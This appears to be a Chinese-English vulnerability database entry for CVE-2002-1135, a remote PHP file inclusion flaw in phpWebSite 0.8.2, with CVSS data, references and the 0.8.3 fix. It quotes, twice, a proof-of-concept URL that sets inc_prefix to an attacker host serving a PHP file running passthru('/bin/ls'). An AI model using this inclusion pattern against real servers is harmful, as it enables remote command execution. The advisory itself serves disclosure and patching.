CVE-2002-1135
CVSS7.5
发布时间 :2002-10-04 00:00:00
修订时间 :2016-10-17 22:24:00
NMCOES    

[原文]modsecurity.php 1.10 and earlier, in phpWebSite 0.8.2 and earlier, allows remote attackers to execute arbitrary PHP source code via an inc_prefix parameter that points to the malicious code.


[CNNVD]phpWebsite PHP文件列入漏洞(CNNVD-200210-185)

        phpWebSite 0.8.2及其之前版本的modsecurity.php 1.10和其早期版本存在漏洞。远程攻击者借助指向恶意代码的inc_prefix参数执行任意PHP源代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1135
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1135
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200210-185
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=103279980906880&w=2
(UNKNOWN)  BUGTRAQ  20020922 PHP source injection in phpWebSite
http://phpwebsite.appstate.edu/article.php?sid=400
(VENDOR_ADVISORY)  CONFIRM  http://phpwebsite.appstate.edu/article.php?sid=400
http://www.iss.net/security_center/static/10164.php
(UNKNOWN)  XF  phpwebsite-modsecurity-file-include(10164)
http://www.securityfocus.com/bid/5779
(UNKNOWN)  BID  5779

- 漏洞信息

phpWebsite PHP文件列入漏洞
高危 配置错误
2002-10-04 00:00:00 2005-05-13 00:00:00
远程  
        phpWebSite 0.8.2及其之前版本的modsecurity.php 1.10和其早期版本存在漏洞。远程攻击者借助指向恶意代码的inc_prefix参数执行任意PHP源代码。

- 公告与补丁

        An updated modsecurity.php script has been released.
        The vendor has addressed the issue in v0.8.3:
        phpWebsite phpWebsite 0.8.2
        

- 漏洞信息 (21825)

phpWebsite 0.8.2 PHP File Include Vulnerability (EDBID:21825)
php webapps
2002-09-23 Verified
0 Tim Vandermeersch
N/A [点击下载]
source: http://www.securityfocus.com/bid/5779/info

A vulnerability has been discovered in phpWebsite which allows an attacker to remotely include a malicious PHP file. It is possible for an attacker to specify a remote location for phpWebsite to download an attacker-supplied htmlheader.php script. 

This issue could be exploited to execute arbitrary commands within the context of the webserver process.

The following proof of concept has been supplied by Tim Vandermeersch:

http://SERVER/catalog/inludes/include_once.php?inc_prefix=http://MYBOX/

--- htmlheader.php ---
<?php echo "<?php passthru("/bin/ls");?>" ?> .		

- 漏洞信息

3848
phpWebSite modsecurity.php inc_prefix Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

phpWebSite contains a flaw that allows a remote attacker include arbitrary PHP files. Due to a lack of sanity checks in the include_once.php script, the inc_prefix variable can be used to include arbitrary PHP files on remote sites. Specially crafted PHP files with commands will be executed on the victim machine with the privileges of the web server.

- 时间线

2002-09-22 Unknow
2002-09-22 Unknow

- 解决方案

Upgrade to version 0.8.3 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

phpWebsite PHP File Include Vulnerability
Configuration Error 5779
Yes No
2002-09-23 12:00:00 2009-07-11 05:06:00
Discovery credited to Tim Vandermeersch.

- 受影响的程序版本

phpWebsite phpWebsite 0.8.2
phpWebsite phpWebsite 0.8.3

- 不受影响的程序版本

phpWebsite phpWebsite 0.8.3

- 漏洞讨论

A vulnerability has been discovered in phpWebsite which allows an attacker to remotely include a malicious PHP file. It is possible for an attacker to specify a remote location for phpWebsite to download an attacker-supplied htmlheader.php script.

This issue could be exploited to execute arbitrary commands within the context of the webserver process.

- 漏洞利用

No exploit is required.

The following proof of concept has been supplied by Tim Vandermeersch:

http://SERVER/catalog/inludes/include_once.php?inc_prefix=http://MYBOX/

--- htmlheader.php ---
&lt;?php echo "&lt;?php passthru("/bin/ls");?&gt;" ?&gt; .

- 解决方案

An updated modsecurity.php script has been released.

The vendor has addressed the issue in v0.8.3:


phpWebsite phpWebsite 0.8.2

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站